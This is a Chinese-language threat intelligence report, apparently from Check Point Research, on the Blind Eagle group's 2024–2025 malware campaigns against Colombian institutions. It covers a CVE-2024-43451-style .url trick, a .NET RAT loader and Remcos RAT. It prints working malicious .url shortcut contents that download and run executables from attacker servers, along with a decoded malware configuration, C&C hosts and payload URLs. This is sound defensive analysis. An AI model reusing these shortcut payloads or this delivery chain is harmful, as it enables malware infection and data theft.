关键点

• Check Point Research发现，自 2024 年 11 月以来，一系列针对哥伦比亚机构和政府实体的攻击活动正在进行中。这些攻击活动与Blind Eagle（也称为APT-C-36）有关，并传播恶意.url文件，其影响与CVE-2024-43451漏洞类似。
• CVE-2024-43451会暴露用户的 NTLMv2 哈希，这可使攻击者通过传递哈希或中继攻击以用户身份进行身份验证。只需右键单击、删除或拖动文件即可触发此漏洞。虽然 Blind Eagle 恶意文件不会利用此漏洞，但它会以同样不常见的方式触发 WebDAV 请求，通知攻击者该文件已下载。最后，当用户单击该文件时，它会通过另一个 WebDAV 请求下载下一阶段的有效负载并执行恶意软件。
• 微软于 2024 年 11 月 12 日修补了原始漏洞。仅仅六天后，Blind Eagle就将此变体纳入了.url其攻击武器库和活动中。
• 监控到的活动针对的是哥伦比亚司法机构和其他政府或私人组织，感染率很高。在 2024 年 12 月 19 日左右发生的一次活动中，有1,600多名受害者受到影响。考虑到 Blind Eagle 的针对性 APT 方法，这一感染率非常高。
• 该恶意软件通常使用合法的文件共享平台（例如Google Drive和Dropbox）进行传播。然而，在最近的活动中，Blind Eagle 还通过****Bitbucket和GitHub分发了其有效载荷。
• 该组织使用的恶意软件和工具在地下犯罪社区中广为人知，这一趋势在最近的发现中仍在延续。为了保护其恶意软件，Blind Eagle 利用了 Packer-as-a-Service HeartCrypt，它使用了一种似乎是  PureCrypter变体的 .NET RAT 。最后一阶段的有效载荷是Remcos RAT。
• 长期以来，人们一直怀疑 Blind Eagle 源自南美洲。我们确定该组织的活动时区为UTC-5 ，与几个****南美洲国家一致。
• 2024 年 3 月初，Operation fail (OPFail) 揭露了该组织假冒哥伦比亚银行的网络钓鱼活动。这些活动非常成功，收集了超过8,000条个人身份信息 (PII)。

介绍

APT-C-36又名盲鹰，是一个从事****间谍和网络犯罪的威胁组织。它主要针对哥伦比亚和其他拉丁美洲国家的组织。这个高级持续性威胁 (APT)组织自****2018 年以来一直活跃，专注于政府机构、金融机构和关键基础设施。

Blind Eagle 以使用复杂的社会工程策略而闻名，他们使用带有恶意附件或链接的****网络钓鱼电子邮件来获取对目标系统的初始访问权限。他们的恶意软件库包括商品远程访问木马 (RAT)，例如NjRAT、AsyncRAT和Remcos。

我们的研究表明，该组织最近在其工具包中添加了其他商品恶意软件。为了保护其恶意可执行文件，Blind Eagle 使用了Packer-as-a-Service HeartCrypt，他们用它来打包一个似乎是PureCrypter变体的****.NET RAT。Remcos RAT仍然是最终的有效载荷。

2024 年 11 月 12 日，微软修补了新发现的漏洞CVE-2024-43451。此漏洞被广泛利用，利用包含恶意代码.url的文件，可以通过不寻常的用户操作（例如右键单击文件、删除文件或执行拖放操作）触发。它被利用****为零日漏洞，用于针对乌克兰的攻击**。据CERT-UA称，该活动归因于威胁行为者UAC-0194**，怀疑与俄罗斯有关。

在微软发布补丁六天后，Blind Eagle在其攻击武器库和活动中加入了该漏洞的变种。虽然此变种实际上并没有暴露 NTLMv2 哈希，但它会通知威胁行为者该文件是通过同样不寻常的用户文件交互下载的。在易受CVE-2024-43451攻击的设备上，甚至在用户以同样不寻常的行为手动与文件交互之前，就会触发WebDAV 请求.url。同时，在修补和未修补的系统上，手动单击恶意文件都会启动下一阶段有效负载的下载和执行。在将此文件纳入他们的活动后，该组织主要针对感染率很高的哥伦比亚公共和私人组织。在 2024 年 12 月 19 日左右发生的活动中，有1600多名受害者受到感染。考虑到 Blind Eagle 的有针对性的 APT 方法，这个感染率是相当高的。

Blind Eagle .url 有效载荷

CVE-2024-43451是一个漏洞，它会暴露用户的 NTLMv2 哈希，从而允许攻击者通过传递哈希或中继攻击以用户身份进行身份验证。如果被入侵的帐户具有高权限且未执行适当的缓解措施（例如 SMB 签名和 NTLM 中继保护），则可能导致横向移动、权限提升甚至整个域被入侵。最终，用户通过手动单击通过端口 445 创建 SMB 连接，从而下载并执行恶意负载。CERT-UA 报告的漏洞：
[InternetShortcut] URL=file://92.42[.]96[.]30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe
IconIndex=1
HotKey=0
IDList=
IconFile=C:\Windows\System32\SHELL32.dll
[{009862A0-0000-0000-C000-000000005986}] Prop3=19,9
[{000214A0-0000-0000-C000-000000000046}] [InternetShortcut.A] [InternetShortcut.W] URL=file://92.42[.]96[.]30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe

CVE-2024-43451影响所有受支持的 Windows 版本，并且以不常见的方式触发：

• 右键单击文件（所有 Windows 版本）。
• 删除文件（Windows 10/11）。
• 将文件拖到另一个文件夹（Windows 10/11 和某些 Windows 7/8/8.1 配置）。

下面的文件.url是 Blind Eagle 用来攻击哥伦比亚机构的，它是此 CVE 的一个变体，但没有利用部分，这意味着它不会暴露 NTLMv2 哈希。当用户手动单击时，此文件也会下载恶意文件，但它不使用SMB（端口：445），而是使用HTTP。当 URL 为 UNC Path 格式时，它会首先尝试 SMB 连接，如果不可用，则尝试 WebDAV。但是，一旦指定了端口（在本例中为）@80，就可以避免SMB尝试，而是直接通过****HTTP使用User-Agent 建立连接Microsoft-WebDAV-MiniRedir/10.0.19044。
[{009862A0-0000-0000-C000-000000005986}] Prop3=19,2
[InternetShortcut] IconIndex=11
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
IDList=
URL=file://\\62.60[.]226[.]64@80\file\4025_3980.exe
HotKey=0

虽然此变体不会直接利用该漏洞，但它表现出不寻常的行为，无需用户手动交互即可与服务器通信。但是，要.url下载下一阶段的有效负载，用户必须手动单击它，这会通过端口 80 触发 WebDAV 请求。

此变体对于威胁行为者来说是一种有价值的工具，因为它会在目标用户下载恶意.url文件时通知他们。即使用户不直接执行文件，Blind Eagle 仍可以检测到交互，从而洞察潜在目标。

图 1 – 未修补的漏洞 – Windows 7，右键单击 WebDAV 请求。

自从微软修补了此漏洞后，这种异常行为不再发生。但是，手动用户交互仍然可以触发恶意负载的下载和执行。

图 2 – 修补 – Windows 10，执行。

盲鹰运动

微软于 2024 年 11 月 12 日发布了此漏洞。11 月 18 日，我们观察到了第一个精心设计的有效载荷。此.url文件感染了已打补丁和未打补丁的机器。从那时起，我们观察到针对哥伦比亚的多个活动，投放的有效载荷是一个 .NET RAT，它会从GitHub或BitBucket下载最后阶段，这是一个Remcos RAT。然而，到目前为止，.urlVirusTotal 上的任何反病毒引擎都无法检测到这些文件中的大多数。

图 3 – 第一阶段 .url 在 VT 上未被检测到。

根据文件名来看，这些正在进行的活动似乎主要针对哥伦比亚的各个政府组织，包括司法系统。以下是一些恶意.url文件名：

[Filename] - Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de CONTINUACIÓN JUICIO ORAL REFERENCIA.url
[English] - "Courts of sentence execution in Bogotá with knowledge function scheduled a hearing for the continuation of the oral trial in reference."

[Filename] NOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url
[English] - "Notification of hearing for the taking of samples involving the defendant."

[Filename] - QUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales de Bogotá.url
[English] - "Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of Bogotá."

[Filename] - este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot.url
[English] - "This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogotá."

[Filename] - en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Seguridad.url
[English] - "By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measures."

[Filename] - COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE.url
[English] - "Communication No. 00239948 issued Criminal 00028483 November 28 / Official Letter No. 00239948 issued Criminal 00028483 November 28."

[Filename] - Oficio Tutelar 0439594 - Proceso N° 03948939-002024.url
[English] - "Protective Order 0439594 - Case No. 03948939-002024."

在使用该特定恶意文件超过两个月的时间里，该 APT 组织已为其最终阶段的有效载荷更改了大约十多个不同的 C&C（命令和控制服务器）。攻击链有一些小的变化，但这些.url文件在初始阶段始终是攻击活动的一部分。

'socialismo' 和 'miami' 活动 - 2025 年 1 月 21 日至 22 日

在 2025 年 1 月 21 日至 22 日左右发生的活动中，该 APT 组织.url通过可能被入侵的 Google Drive 帐户通过电子邮件分发了多个文件。

图 4 – 带有 Google Drive 链接的电子邮件。

文件中指定的文件图标.url与 Edge 浏览器中的图标相同。所联系的许多端点都.url包含多个恶意文件，尽管我们不能将这些服务器上托管的所有文件都归咎于Blind Eagle。
[{009862A0-0000-0000-C000-000000005986}] Prop3=19,2
[InternetShortcut] IconIndex=11
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
IDList=
URL=file://\\62.60.226[.]64@80\file\3819_5987.exe
HotKey=0
下载的可执行文件似乎是使用 Packer as a Service HeartCrypt加壳的。随后它会注入csc.exe一个 .NET 可执行文件，该可执行文件负责解壳并在内存中执行 .NET RAT，它似乎是PureCrypter的一个变种。此 .NET RAT 会检索各种用户和机器信息，例如 1）用户名、2）操作系统版本、3）进程名称和架构、4）安装的防病毒软件以及其他机器规格。在它解密作为资源嵌入的配置后，我们观察到了攻击活动 IDsocialismo和进行通信的 C&C。C&Crepublicadominica2025[.]ip-ddns[.]com在收到用户数据后，会以一个 URL 进行响应，以下载并执行下一阶段的有效负载。最后阶段是从 GitHub 存储库下载的Oscarito20222/file，恶意软件是已知的远程访问木马**Remcos RAT，**其 C&Celyeso.ip-ddns[.]com:30204和僵尸网络名称为redtube。

图 5 – 社会主义运动攻击链。

.NET RAT 和 Remcos RAT 的两个域名都解析为同一个 IP 地址177.255.85[.]101。该组织在 1 月和 2 月的活动中曾将此 IP 用于多个 Remcos C&C：

amuntgroupfree.ip - ddns [ . ] com

donato.con - ip [ . ] com

elyeso.ip - ddns [ . ] com

comina998.ddns - ip [ . ] net

republicadominica2025.ip - ddns [ . ] com

值得一提的是，攻击者的 GitHub 存储库在多个 Blind Eagle 活动中用于传递最后阶段的有效载荷**Remcos。**此存储库不断更新与最新 C&C 通信的新文件。所有存储库更新均在时区提交-0500，这可能表明 Blind Eagle 的原籍国与南美国家一致。提交示例：

==================================================
[2025-02-04T20:00:59Z] Author: Oscarito20222
tree 62c86b52fabaaecc398b902965e58c4154edc427
parent a84f5a384b090598cd29be6b2492cbb45c73c3ac
author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1738699259 -0500
committer GitHub noreply@github.com 1738699259 -0500

Add files via upload

• fuck.exe - 3bd90557615ef95e4244bdbaa8e0e7fd949cdd3a
• redtube.exe - 758c73ab9706ae6977f9b4601c20b3667836d3ef
• roma.exe - ba95ea1dcc744566a9552d9665feff035925a5c5
  ==================================================
  [2025-02-06T15:51:50Z] Author: Oscarito20222
  tree 220a606655d64d03762d319c5f5b80038e5bc13c
  parent 29335b62acef53cb7076f81b8fa25e9baf6d9994
  author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1738857110 -0500
  committer GitHub noreply@github.com 1738857110 -0500

Delete roma.exe

[2025-02-06T15:52:02Z] Author: Oscarito20222
tree e9e56beee7cf526a4df97e35f2df9458cae0ec23
parent b7f7fe7ce6d5eb7453ca5edd616bc9f071cd3ea5
author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1738857122 -0500
committer GitHub noreply@github.com 1738857122 -0500

Delete redtube.exe

[2025-02-06T15:52:11Z] Author: Oscarito20222
tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904
parent d2279dc66302d8afad41c82ad81d0733e1f2273d
author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1738857131 -0500
committer GitHub noreply@github.com 1738857131 -0500

Delete fuck.exe

[2025-02-06T15:52:33Z] Author: Oscarito20222
tree 5d1edc470b4b33a31f982077e08b2e61f438feab
parent a7b74e834eddb6eb9a23a268c7088b3aeba493d4
author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1738857153 -0500
committer GitHub noreply@github.com 1738857153 -0500

Add files via upload

• normales.exe - 3d3248ad14dce8b6fcf416d56d8de52b07b549e7

GitHub 帐户还包含另一个名为 的存储库diciembre，其中包含一个带有文件的存档.vbs。值得注意的是，两年前的这个提交与最近的活动是在同一个UTC-5 时区进行的。

图 6 – Blind Eagle GitHub 帐户。

这个存储库在两年多的时间里都“未曾动过”，于 2025 年 2 月 25 日进行了更新，并引入了带有 C＆C 的新Remcos RAT21ene.ip-ddns[.]com:30204。

图 7 – 最近的diciembre存储库活动。

活动“PARAISO”、“PARAISO2”、“marte”和“saturno”——2024 年 12 月

虽然与之前的活动类似，但这次利用Bitbucket而不是GitHub作为最后阶段的分发平台。

Campaign	.NET RAT C&C	Remcos C&C	Remcos ITW
[2024-12-10] marte	newstaticfreepoint24.ddns-ip[.]net -> 181.131.217.244	newstaticfreepoint24.ddns-ip[.]net	bitbucket[.]org/facturacioncol/fact/downloads/FileHosting.exe <br>bitbucket[.]org/facturacioncol/fact/downloads/luna.exe
[2024-12-11] saturno	newstaticfreepoint24.ddns-ip[.]net	newstaticfreepoint24.ddns-ip[.]net	bitbucket[.]org/facturacioncol/fact/downloads/Out2.exe
[2024-12-19] PARAISO	newstaticfreepoint24.ddns-ip[.]net	newstaticfreepoint24.ddns-ip[.]net	bitbucket[.]org/trabajo12023/proyecto/downloads/ROSAS.exe <br>bitbucket[.]org/trabajo12023/proyecto/downloads/Final1278685280.exe
[2024-12-19] PARAISO2	newstaticfreepoint24.ddns-ip[.]net	newstaticfreepoint24.ddns-ip[.]net <br>17dic.ydns[.]eu -> 181.131.217.244	bitbucket[.]org/trabajo12023/proyecto/downloads/AD.exe <br>bitbucket[.]org/trabajo12023/proyecto/downloads/Simpson.exe <br>bitbucket[.]org/trabajo12023/proyecto/downloads/Final1278685280.exe

在这些活动中，两个 Bitbucket 存储库被滥用，其中包含Remcos RAT可执行文件，这些文件于****2024 年 12 月左右上传到Bitbucket。考虑到该 APT 组织的活动和方法，最终有相当多的受害者下载了这些恶意可执行文件。

图 8 – facturacioncol/factBitbucket 存储库。

此次PARAISO攻击活动非常成功，超过1600 名受害者被Remcos RAT和 C&C感染newstaticfreepoint24.ddns-ip.net:3020。这些攻击活动持续了一周多，总共感染了大约9,000 人。

图 9 – trabajo12023/proyectoBitbucket 存储库。

盲鹰 – .url 活动

自从将此文件添加到其武器库后，Blind Eagle一直将哥伦比亚作为攻击目标，主要针对司法部门和其他政府组织。该组织发送带有恶意 Google Drive 链接的电子邮件，其中包含存档或实际的.url。这些文件在未打补丁的机器上触发 WebDAV 请求，一旦用户点击，就会产生 WebDAV 请求，从而下载包含HeartCrypt的恶意软件。该恶意软件随后提取并注入打包的 .NET 加载程序，后者随后加载了 .NET RAT，该 RAT 似乎是PureCryptercsc.exe的变种。此 .NET RAT 解密了其配置，其中包含执行参数，例如 C&C 服务器和活动 ID。在发送加密的用户数据后，该恶意软件会收到一个 URL 以下载最后一阶段的负载Remcos RAT。这些最终的负载最初托管在被入侵的服务器上，后来托管在GitHub或Bitbucket上。

图 10 – 盲鹰 11 月至 2 月活动。

在多次攻击活动中，该组织为其 C&C 服务器注册了不同的域名，尽管它们托管在同一个 IP 地址上。在 等攻击活动中socialismo，.NET RAT 的 C&Crepublicadominica2025[.]ip-ddns[.]com在最后阶段为 和elyeso.ip-ddns[.]com，但它们都解析到同一个 IP 177[.]255.85[.]101。

APT OPFail 及过去的网络钓鱼活动

Check Point Research密切监视Blind Eagle活动，我们发现一次操作失败，该组织在其中泄露了其过去的网络钓鱼活动以及受害者的个人身份信息 ( PII )。

1 月和 2 月期间，该 APT 组织通过上传到存储库的文件投递了最后一阶段的有效载荷Oscarito20222/file。该帐户Oscarito20222还有另一个存储库，其中只有两年前的一次提交Oscarito20222/diciembre。

2025 年 2 月 25 日，情况发生了变化。存储库diciembre收到更新，并在接下来的活动中开始提供Remcos。为了了解这种转变发生的原因，我们必须检查负责在攻击链中提供最终有效载荷的先前存储库。

Oscarito20222/file最终提交：

[2025-02-25T14:01:33Z] Author: Oscarito20222
tree f03354f986a1398d1b471c0af75b404474cf94f7
parent 9653938c6fd4b347209d87923f3617d70a3c12e2
author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1740492093 -0500
committer GitHub noreply@github.com 1740492093 -0500

Add files via upload

• Ver Datos del Formulario.html - e0837aebd649dba01bc4d594ef21a8086edaaeeb
  ==================================================
  [2025-02-25T15:27:01Z] Author: Oscarito20222
  tree 63a5c5307b93e0393aba14b42d7915ab7a2733ef
  parent 12eacb556eee889a16beb2fe9449748ebb4e33b0
  author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1740497221 -0500
  committer GitHub noreply@github.com 1740497221 -0500

Delete Ver Datos del Formulario.html

在大约1 小时 27 分钟的时间里，该组织上传了一个名为 的 HTML 文件Ver Datos del Formulario.html，该文件后来被删除。截至目前，这仍然是存储库中记录的最后一个操作，发生在2025 年 2 月 25 日 15:27 UTC。

图 11 – 存储库的最后提交Oscarito20222/file。

此时，Blind Eagle使用存储库恢复活动Oscarito20222/diciembre，第一次提交发生在UTC 当天 17:39：

==================================================
[2022-12-21T17:31:25Z] Author: Oscarito20222
tree 67eb4f5d839ca89b28203a27ce3ca74029b93b7c
author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1671643885 -0500
committer GitHub noreply@github.com 1671643885 -0500

Add files via upload

• 2112-2.7z - 4e3cb251fb98a47c2f5dec5f3722723990c17a49
  ==================================================
  [2025-02-25T17:39:17Z] Author: Oscarito20222
  tree 1b6fc5c2150d598472f892a88305545626d977bd
  parent de2b332d06251e6449760ceead598a56da637daa
  author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1740505157 -0500
  committer GitHub noreply@github.com 1740505157 -0500

Add files via upload

• sena.exe - abf71fd332b760da29aa211f4aaa1661860a98c6
  ==================================================
  [2025-02-25T17:39:29Z] Author: Oscarito20222
  tree 3262538dbe881b34cfd71cedcb27e03688573f0e
  parent 408d7ef19b151668e2445532e06c6b3a569ebf98
  author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1740505169 -0500
  committer GitHub noreply@github.com 1740505169 -0500

Delete 2112-2.7z

[2025-02-26T15:07:11Z] Author: Oscarito20222
tree d119d827561c0796c50deb8cf69f324811479e88
parent d645bd6c880358d2bb4dfd83252ebbb6156c6b5c
author Oscarito20222 121189488+Oscarito20222@users.noreply.github.com 1740582431 -0500
committer GitHub noreply@github.com 1740582431 -0500

Add files via upload

• TobaccoAnnouncement.exe - 44182ce5a8fadef41064d7c0266e8f99015262b0

Opfail 时间线：

• 2025-02-25 14:01 UTC，Blind Eagle 将Oscarito20222/file来自网络钓鱼活动的 PII 数据上传到 HTML。
• 2025-02-25 15:27 UTC，删除包含 PII 的 HTML 文件。
• 2025-02-25 17:39 UTC，将Remcos RAT和 C&C上传21ene.ip-ddns[.]com至Oscarito20222/diciembre存储库
• 2025-02-25 17:39 UTC，删除Oscarito20222/diciembre大约两年前上传的档案。

Check Point Research获得了这个 HTML 文件，该文件与 2024 年 3 月初的网络钓鱼活动有关。该网络钓鱼域名servicioseguroenlineabb[.]com似乎冒充了哥伦比亚银行。

PII 数据包含四个字段：

1. 用户名
2. **Contraseña Usuario，**用户密码
3. 电子邮件地址
4. **Contraseña del correo，**电子邮件密码
5. Clave Cajero， ATM PIN

该数据集（简称**“Datos del Formulario”）包含超过 8,400 条记录**，过滤掉空记录或不足记录后，有效记录为8,075 条。这些有效记录包括****账户-密码对（用户名或电子邮件或所有填写的数据），其中识别出1,634 个电子邮件地址。

此次网络钓鱼活动专门针对哥伦比亚用户。收集的电子邮件地址包括：

• 大多数是个人账户（Gmail、Yahoo、Hotmail 等）。
• 其中五人属于哥伦比亚政府。
  • 邮件地址：policia.gov.co
  • 政府网站
  • contraloria.gov.co
  • adr.gov.co
  • dian.gov.co
• 其中有十四个与****教育机构有关。
• 其余地址属于在哥伦比亚经营的企业。

.NET RAT——“Remcos 下载器”

在恶意软件活动期间传播的.NET RAT受到 HeartCrypt 的保护，HeartCrypt 是一种打包即服务(PaaS)，于 2024 年初出现，用于混淆恶意软件并逃避安全软件的检测。此打包程序将恶意代码嵌入到原本合法的二进制文件中，并将打包的有效负载存储为资源。执行时，HeartCrypt 首先解压一个简单的 .NET 打包程序，该打包程序被注入并在其中触发csc.exe。

该**.NET 打包程序**包含一个嵌入式缓冲区，其特点是：

1. 使用 AES 解密
2. 使用 GZIP 解压缩
3. 作为.NET RAT 程序集加载到内存中

此外，最终的可执行文件（.NET RAT 程序集）使用NET-Reactor进行混淆，应用字符串加密和控制流混淆以进一步阻碍分析。

图 12 – .NET Packer，解包过程。

大多数字符串都经过加密并存储在资源中，执行开始时会立即解密。然后，每次需要特定字符串时，恶意软件都会根据索引 ID 请求它，其中索引指向字符串的DWORD#US大小，后跟字符串内容。解密变量（包含解密字符串资源）遵循字符串在 .NET 二进制文件中流中存储的结构。NETReactorSlayer（一种著名的开源反混淆器，用于 NET-Reactor 保护的二进制文件）能够解密这些字符串并反混淆这些二进制文件。

图 13 – 根据索引 ID 检索字符串的函数。

解密的资源包含一个 base64 字符串，该字符串被反序列化并包含恶意软件配置以及 C＆C。CmIKIXJlcHVibGljYWRvbWluaWNhMjAyNS5pcC1kZG5zLmNvbRD56wEYBSIIbW9ubzEyMzQyCnNvY2lhbGlzbW9CElNwb25zb3JzaGlwVGltZW91dGINTmV4dEFjdGl2YXRvcg==
{
"1": {
"1": "republicadominica2025[.]ip-ddns[.]com",
"2": 30201,
"3": 5,
"4": "mono1234",
"6": "socialismo",
"8": "SponsorshipTimeout",
"12": "NextActivator"
}
}

该恶意软件收集有关执行、机器和用户的信息，然后使用protobuf对其进行序列化，并使用 AES 对其进行加密。发送到 C&C 的数据：

• 机器人 ID
• 广告系列 IDsocialismo
• 用户名
• 操作系统版本
• 恶意软件版本0.3.9
• 已安装防病毒软件
• 流程架构
• 进程名称
• 机器规格……

该恶意软件尝试从 C＆C 域名（GetHostAddresses）中检索 IP 地址，如果成功，则发送收集到的信息。

图 14 –使用 C＆C 的 GetHostAddresses。

socialismo数据被序列化，机器信息与恶意软件活动和版本一起发送0.3.9。

图 15 – 数据序列化。

用于加密和解密网络通信的 AES 密钥是通过Rfc2898DeriveBytes使用互斥锁名称mono1234和盐作为密码而得出的{ 1, 2, 23, 234, 37, 48, 134, 63, 248, 4 }。

图 16 – AES 密钥生成。

然后，类似的过程会从 C&C 服务器检索响应，该服务器会使用包含 DWORD 大小的缓冲区进行响应，后跟 AES 加密缓冲区。此时，Blind Eagle 已将此 RAT 用作下载程序，接收包含正在下载的文件的 URL，并将其注入MSBuild.exe或InstallUtil.exe。

图 17 – 随机选择要注入的进程。

尽管Blind Eagle最常使用此命令，并利用此 .NET RAT 作为简单的下载器，但该恶意软件还包含其他功能，例如在磁盘上下载下一个有效负载、通过计划任务保持持久性，甚至执行 PowerShell 脚本。

图 18 – Powershell 文件执行。

结论

Blind Eagle 仍然是拉丁美洲最活跃、最危险的威胁行为者之一，主要针对哥伦比亚的公共和私营部门。该组织的规模和持久性显而易见，单次攻击活动就记录了超过1,600 例感染。长期以来，人们一直怀疑该组织源自拉丁美洲，而确认其活动时区为UTC-5，进一步将其可能的活动范围缩小到几个南美国家。

尽管微软于2024 年 11 月 12 日发布了****CVE-2024-43451补丁，但 Blind Eagle 很快做出调整，仅用六天就推出了该“漏洞”的变种。这种快速反应凸显了该组织的技术专长、适应能力以及对新攻击方法的不懈追求。通过将恶意文件纳入其武器库，Blind Eagle 不断改进其策略，确保其恶意软件传播在不断发展的安全防御下仍然有效。.url

其成功的关键因素是能够利用合法的文件共享平台，包括Google Drive、Dropbox、Bitbucket和GitHub，从而绕过传统安全措施并秘密传播恶意软件。此外，它还使用Remcos RAT、HeartCrypt和PureCrypter等地下犯罪软件工具，这加强了其与网络犯罪生态系统的深厚联系，使其能够使用复杂的规避技术和持久访问方法。

Blind Eagle 的快速发展、有效的社会工程策略以及对公共和私营部门实体的关注使其成为一种严重的网络安全威胁。减轻其影响需要主动威胁情报、高级安全防御和持续监控。组织必须对网络钓鱼活动、基于文件的恶意软件传播和非常规攻击技术保持警惕，才能领先于这个不断适应的对手。

Indicators of Compromise

Description	Value
Stage 1 – ITW Endpoints	drive.usercontent[.]google[.]com/download?id=1CZcgN1kxz9kSNgscR9qgiOAERo-w-rTa&export=download <br>drive.usercontent[.]google[.]com/download?id=1PZ2Ndi-GT-oQHlobFIdDJoSDSXkJvECV&export=download <br>drive.usercontent[.]google[.]com/download?id=1R9MR64hy-dQelTZMPtsrSXLWObFt7mf2&export=download
Stage 1 – .url	1d1e007a9d8939bee7a0333522cc4f7480d448cc <br>133bc4304057317b0b93f5ff44f20d153b985b50 <br>1fcc44d3b20381acce66f5634743917e8f22dae7 <br>a0338654304b6f824bdc39bbb482a0e114f8a3a1
Stage 2 – ITW Endpoints	62.60.226[.]64/file/1374_2790.exe <br>62.60.226[.]64/file/3819_5987.exe <br>62.60.226[.]64/file/4025_3980.exe <br>62.60.226[.]64/file/9451_1380.exe
Stage 2 – Payloads	07647f0eddf46d19e0864624b22236b2cdf561a1 <br>08daf84d9c2e9c51f64e076e7611601c29f68e90 <br>83c851f265f6d7dc9436890009822f0c2d4ba50a <br>33ddaedc98991435f740f7a5a8a931a8cadd5391
State 2 – C&C	republicadominica2025[.]ip-ddns[.]com
Stage 3 – ITW Endpoint	raw.githubusercontent[.]com/Oscarito20222/file/refs/heads/main/redtube.exe
Stage 3 – Remcos	758c73ab9706ae6977f9b4601c20b3667836d3ef
Stage 3 – Remcos C&C	elyeso.ip-ddns[.]com:30204